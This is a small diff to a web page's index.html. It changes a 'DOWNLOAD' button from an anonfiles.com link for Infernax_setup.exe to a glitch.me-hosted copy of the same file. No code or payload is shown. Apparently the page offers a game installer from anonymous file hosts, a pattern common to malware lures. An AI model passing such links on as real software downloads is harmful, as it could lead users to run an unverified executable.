--- a/index.html
+++ b/index.html
@@ -110,7 +110,7 @@
 
 
 					<!-- CAROUSSEL ENDS-->
-          						<div class="skulll"></div><a href="https://cdn-121.anonfiles.com/tcjea4n2y4/c7ae2e4f-1654364241/Infernax_setup.exe" target="https://cdn-121.anonfiles.com/tcjea4n2y4/c7ae2e4f-1654364241/Infernax_setup.exe"> <div class="desctitle mediatitle">
+          						<div class="skulll"></div><a href="https://cdn.glitch.me/e0c41f8a-171b-4e20-8a54-fbea132622af/Infernax_setup.exe?v=1655318617728" target="https://cdn.glitch.me/e0c41f8a-171b-4e20-8a54-fbea132622af/Infernax_setup.exe?v=1655318617728"> <div class="desctitle mediatitle">
 							DOWNLOAD
 						</div></a><div class="skullr"></div>
 				</div>
